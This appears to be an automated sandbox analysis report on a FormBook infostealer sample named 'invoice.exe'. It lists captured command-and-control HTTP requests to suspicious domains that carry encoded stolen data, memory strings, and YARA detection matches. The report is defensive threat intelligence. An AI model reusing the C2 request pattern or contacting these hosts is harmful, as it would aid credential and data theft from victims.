Source: global traffic	HTTP traffic detected: POST /dj6o/ HTTP/1.1Host: www.53kzl.xyzConnection: closeContent-Length: 5333Cache-Control: no-cacheOrigin: http://www.53kzl.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.53kzl.xyz/dj6o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 77 3d 73 32 51 45 5a 43 70 76 28 43 4c 59 57 43 6f 52 36 2d 66 64 65 44 61 67 62 57 65 4a 63 75 6b 67 45 61 7e 33 52 62 6b 79 4d 78 66 4c 45 33 6e 78 4b 33 7a 49 59 71 77 34 41 6c 52 54 28 39 6f 74 37 5a 74 56 64 6d 67 59 4a 46 37 63 30 2d 6f 4e 68 70 78 49 78 4a 50 39 30 2d 4c 78 4a 4e 4d 70 56 4d 75 5f 35 79 43 6d 66 42 32 30 4b 44 7e 59 4d 54 58 72 50 31 4b 49 4f 44 55 54 64 72 51 33 48 5a 41 5a 49 44 47 65 6e 54 58 63 4f 62 4d 2d 66 6d 50 34 63 4d 7a 6f 63 34 54 61 28 52 28 72 57 37 39 36 78 41 41 43 51 49 6d 4b 62 30 46 76 67 74 79 4f 42 45 39 6e 44 43 77 6f 7a 45 64 6a 58 6b 4b 79 78 36 7a 6c 6b 6f 67 43 37 46 62 62 38 74 73 74 63 6b 6f 67 37 66 30 34 32 4a 45 51 5a 32 67 5f 72 4c 76 64 53 70 56 31 72 43 4c 38 44 61 54 37 57 62 57 6c 57 39 58 6c 62 34 4a 79 4b 6b 66 66 78 79 53 35 67 70 70 4c 6e 4d 4d 64 4f 30 70 61 7a 75 6a 32 37 78 35 76 58 73 54 66 7e 68 28 30 28 54 42 68 54 66 6d 51 54 54 69 47 4e 5f 37 43 67 61 56 61 5a 4d 69 46 44 4e 32 48 4f 62 34 4b 5a 69 5a 7a 71 43 34 79 73 76 54 58 34 74 59 68 28 6e 72 66 31 45 78 47 74 70 58 4a 54 4e 65 6f 37 77 4a 34 44 64 54 5f 71 39 4b 47 76 74 72 4d 61 66 41 63 33 55 5a 47 6b 6b 44 46 4d 64 37 6f 41 42 53 6f 4d 66 7e 53 48 77 28 6b 4f 33 58 4f 62 64 35 69 7e 33 6f 44 4e 52 59 55 32 30 6e 37 45 33 36 74 68 50 63 54 7a 76 63 36 68 4d 6f 79 57 37 4f 75 57 41 6c 38 6f 50 32 36 4b 52 6c 4c 4b 77 44 78 6d 49 42 70 61 49 57 53 42 55 45 42 76 6f 6f 4f 76 6c 46 59 72 77 4e 69 79 33 63 6b 54 46 5a 6a 53 35 34 6f 54 70 42 79 76 54 7e 6b 4e 4d 35 6e 6a 48 69 6d 45 44 53 4f 4e 35 31 32 64 35 55 44 68 46 52 4b 6b 78 43 4d 45 46 6c 61 42 77 48 39 50 6e 56 43 62 64 70 50 67 6b 79 58 64 6c 72 42 4d 6f 56 61 43 45 30 5a 4a 48 34 44 51 4e 68 33 69 45 6e 71 63 63 28 56 4b 6c 34 66 78 68 79 57 4d 44 58 31 57 59 36 30 32 6c 6b 36 6f 74 73 53 51 5a 70 41 35 35 63 42 42 79 77 45 4c 4d 58 35 69 73 47 42 39 4a 54 2d 69 39 73 73 6e 4b 57 4f 37 78 57 48 38 39 39 71 63 30 38 37 62 66 65 38 7a 67 6a 52 70 78 53 6e 6a 55 79 2d 65 42 34 7a 47 6f 33 37 42 2d 66 5f 59 7a 66 36 6d 69 57 59 4e 4a 44 42 61 50 48 39 69 4a 66 4a 39 35 31 52 45 76 36 4e 64 55 35 43 66 7a 56 67 48 43 52 73 70 74 45 39 45 31 41 65 67 72 77 50 30 48 7e 2d 66 4e 6c 45 30 6b 6e 37 74 75 79 2d 35 56 37 5a 68 56 31 35 4e 67 61 50 33 39 45 69 38 41 44 31 55 38 28 44 58 4b 63 6b 75 5a 35 6f 44 51 61 59 57 4e 79 4f 6e 7a 70 5a 41 6c 57 72 6e 2d 36 47 73 78 61 4a 78 37 59 57 47 64 30 77 37 7a 6c 77 37 35 67 65 4c 78 76 37 6d 4d 28 39 6b 72 79 77 74 51 78 51 66 73 79 71 6b 47 72 50 4c 39 6a 5a 47 41 6a 4b 64 73 5a 33 68 77 64 66 54 56 63 74 4e 6c 49 63 76 54 50 73 6f 2
Source: global traffic	HTTP traffic detected: POST /dj6o/ HTTP/1.1Host: www.soft-r.proConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.soft-r.proUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.soft-r.pro/dj6o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 77 3d 69 6c 70 57 37 57 44 61 5a 63 6e 62 33 66 77 53 72 64 72 5f 62 50 38 30 75 64 51 71 54 66 78 6a 6e 64 6c 32 78 56 56 56 61 4a 44 6c 68 61 74 66 6d 4c 67 67 37 49 61 4d 28 44 4c 77 7a 5f 63 41 46 33 76 47 41 55 43 34 72 54 39 32 58 36 35 35 70 62 7a 36 54 78 64 6e 65 68 78 32 32 31 4c 55 50 76 4b 78 43 63 49 49 55 5f 70 63 73 32 55 67 61 35 6b 6a 61 53 54 56 64 58 42 6d 42 48 69 77 51 76 76 56 38 41 64 75 74 65 63 68 32 41 4f 53 75 48 66 76 4b 39 75 70 61 71 4b 4e 4b 34 5a 62 43 50 79 76 52 66 28 70 5a 5f 66 54 57 42 54 34 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVw=ilpW7WDaZcnb3fwSrdr_bP80udQqTfxjndl2xVVVaJDlhatfmLgg7IaM(DLwz_cAF3vGAUC4rT92X655pbz6Txdnehx221LUPvKxCcIIU_pcs2Uga5kjaSTVdXBmBHiwQvvV8Adutech2AOSuHfvK9upaqKNK4ZbCPyvRf(pZ_fTWBT4ng).
Source: global traffic	HTTP traffic detected: POST /dj6o/ HTTP/1.1Host: www.soft-r.proConnection: closeContent-Length: 5333Cache-Control: no-cacheOrigin: http://www.soft-r.proUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.soft-r.pro/dj6o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 77 3d 69 6c 70 57 37 57 44 61 5a 63 6e 62 31 38 6f 53 6e 63 72 5f 63 76 39 47 6c 39 51 71 64 5f 77 71 6e 64 70 32 78 55 67 4e 61 5f 7a 6c 68 4a 56 66 6d 6f 49 67 39 49 61 4d 35 44 4c 30 73 76 63 57 46 33 53 33 41 52 6d 6f 72 56 74 32 52 6f 42 35 72 37 7a 31 61 78 64 6d 64 68 78 31 35 56 4c 55 50 76 57 4c 43 59 64 39 55 2d 52 63 73 6b 63 67 61 36 41 67 62 43 54 55 43 48 42 6d 42 48 6d 4a 51 76 76 46 38 41 31 2d 74 65 38 68 31 79 57 53 69 79 7a 67 4e 74 75 69 54 4b 4c 38 5a 72 49 45 49 34 71 63 54 5f 48 67 53 71 32 67 61 45 36 71 28 57 6a 4e 6f 71 38 69 66 6c 57 31 6c 58 78 56 6d 67 4d 59 7a 79 50 5f 51 61 77 42 54 6e 6b 4e 53 71 48 45 4b 51 75 62 78 56 4a 2d 7a 63 36 78 32 47 6a 37 71 35 5a 70 4e 72 35 77 32 36 52 6d 52 68 41 55 55 34 30 32 35 56 55 66 62 30 5a 6a 74 73 77 51 30 71 7a 71 67 4e 51 62 4f 37 32 55 59 50 55 31 73 6e 47 68 6e 71 64 49 48 6c 72 78 30 6b 63 38 39 70 7e 59 41 6f 28 4e 5a 4d 37 57 59 69 4c 31 62 4d 30 49 4d 4a 43 77 54 42 7e 5f 70 61 57 32 32 50 31 54 6d 38 30 32 76 6e 67 61 73 45 63 38 77 33 4a 65 49 35 47 54 64 55 4b 39 63 77 33 76 6e 52 72 51 4e 36 7a 70 78 38 7e 76 6a 71 70 48 42 69 72 69 73 62 59 4e 4c 75 76 52 61 6a 67 33 4f 56 6b 47 6c 59 51 4b 62 65 4c 48 38 50 68 52 44 70 6d 61 57 4f 4f 64 65 79 59 49 79 64 57 66 7e 6d 76 77 59 50 37 38 67 31 31 2d 6d 67 7a 54 42 35 43 44 49 69 79 43 43 63 4e 72 37 4f 49 57 57 32 70 51 44 37 33 72 4a 51 68 33 4a 42 77 48 52 5f 49 77 6d 6f 7e 67 78 56 62 4e 58 6f 6a 52 58 75 69 78 65 6a 35 47 67 54 45 70 32 63 35 65 4e 4d 75 50 6c 36 70 45 43 6f 66 59 57 4e 56 6b 69 56 46 36 37 61 74 70 67 34 48 76 54 7a 7a 63 33 56 52 74 38 48 7a 4c 50 4d 76 6d 79 6b 6f 77 59 72 59 72 71 7a 4d 62 67 46 64 47 56 52 72 53 62 31 46 4f 6f 33 76 34 77 33 43 69 79 44 5a 31 6a 69 4f 74 4a 55 38 34 55 35 4f 68 62 6f 50 67 54 63 7e 6a 59 57 39 6d 42 45 35 4e 4e 52 48 6e 69 53 68 32 42 51 7a 54 6d 62 65 5a 52 74 57 70 66 53 7a 58 6a 72 68 45 5a 33 41 4a 47 4a 56 49 74 72 4d 56 34 45 31 53 58 32 6a 71 50 65 6a 59 48 62 73 35 55 50 7a 46 6c 78 34 4a 30 6b 63 5f 4d 4f 28 57 41 50 44 36 6f 4f 55 72 5a 39 48 6d 79 4f 65 37 35 64 4c 68 56 76 47 64 32 56 36 37 6d 4d 64 55 50 4e 63 49 38 38 6c 77 70 63 74 78 6f 48 6f 33 33 5a 49 5f 68 5f 66 57 7e 76 50 31 71 65 7a 46 73 57 28 44 55 61 68 32 35 4a 6f 4d 6b 62 65 71 71 45 4f 6c 71 61 6b 76 7a 4a 41 67 46 41 58 49 28 73 50 67 4e 4a 52 4d 43 46 74 2d 34 6e 48 48 66 41 48 79 54 75 52 4e 6c 74 65 50 5a 73 32 4b 71 79 36 46 38 32 34 74 6d 73 4b 36 72 37 67 62 69 33 4a 35 48 4e 52 67 42 33 50 79 48 75 49 35 42 61 34 30 44 39 7e 6e 75 4c 69 76 33 50 47 73 36 55 47 45 6a 6c 61 64 5

Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://181ue.com/sq.html?entry=
Source: invoice.exe, 00000000.00000003.241728711.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: msiexec.exe, 0000000C.00000002.510045303.0000000004D06000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: msiexec.exe, 0000000C.00000002.510216678.000000000502A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: C5G1Z47d2.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: C5G1Z47d2.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: C5G1Z47d2.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: C5G1Z47d2.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: invoice.exe	String found in binary or memory: https://github.com/cipher450
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.b0a57cbbe8efd7017472.js
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.e39146d1af90e9bff26d.css
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 0000000C.00000002.510045303.0000000004D06000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: unknown

HTTP traffic detected: POST /dj6o/ HTTP/1.1Host: www.53kzl.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.53kzl.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.53kzl.xyz/dj6o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 77 3d 73 32 51 45 5a 43 70 76 28 43 4c 59 57 6a 34 52 71 74 33 64 4c 7a 61 6e 48 6d 65 4a 54 4f 6b 73 45 61 43 33 52 5a 49 69 4d 6b 50 4c 45 67 4c 78 4b 55 4c 49 4c 61 77 34 47 6c 52 70 78 64 70 75 37 5a 6f 6b 64 6b 49 6d 4a 48 33 63 31 74 51 4e 6c 4a 78 4c 73 35 50 38 33 2d 4c 77 4e 4e 4d 70 56 4d 72 63 35 7a 43 63 66 41 4f 30 4c 77 32 59 4d 57 37 73 64 31 4b 56 4d 44 55 54 64 72 63 6b 48 5a 41 6a 49 44 65 33 6e 53 33 63 4d 4f 49 2d 54 54 7a 37 61 63 79 67 44 49 53 37 28 30 4f 42 66 70 4e 6b 30 77 49 50 56 38 50 39 56 33 45 57 38 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVw=s2QEZCpv(CLYWj4Rqt3dLzanHmeJTOksEaC3RZIiMkPLEgLxKULILaw4GlRpxdpu7ZokdkImJH3c1tQNlJxLs5P83-LwNNMpVMrc5zCcfAO0Lw2YMW7sd1KVMDUTdrckHZAjIDe3nS3cMOI-TTz7acygDIS7(0OBfpNk0wIPV8P9V3EW8w).

Source: unknown

DNS traffic detected: queries for: www.bunniesfor-sales.site

Source: global traffic	HTTP traffic detected: GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=NMTOyXsc8ePY2MKPEps/R25z0YSV56yvdacE+LTNH3L/G6DIQ9NvLR18puwfz5ktIQRwsxKrERsH/7mcoV+cyDukUw1T3fVygQ== HTTP/1.1Host: www.bunniesfor-sales.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dj6o/?tVw=h04kayJb3ljXRQcX7vvRWSjXbEa8Wdd7FpeJSrMka0q/M3vTEVv/IaMbJiFl7sx9hbZGfk4FCy3OyfUPlJlZw4D92suLIakcOQ==&7n9pqx=K2Mp5pqx32_lRZL HTTP/1.1Host: www.53kzl.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw== HTTP/1.1Host: www.soft-r.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: invoice.exe, 00000000.00000002.275461076.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.376676313.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RegSvcs.exe PID: 5440, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 5196, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: invoice.exe

.NET source code contains very large strings

Source: invoice.exe, Form1.cs	Long String: Length: 129663
Source: 0.0.invoice.exe.310000.0.unpack, Form1.cs	Long String: Length: 129663

Source: invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.376676313.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
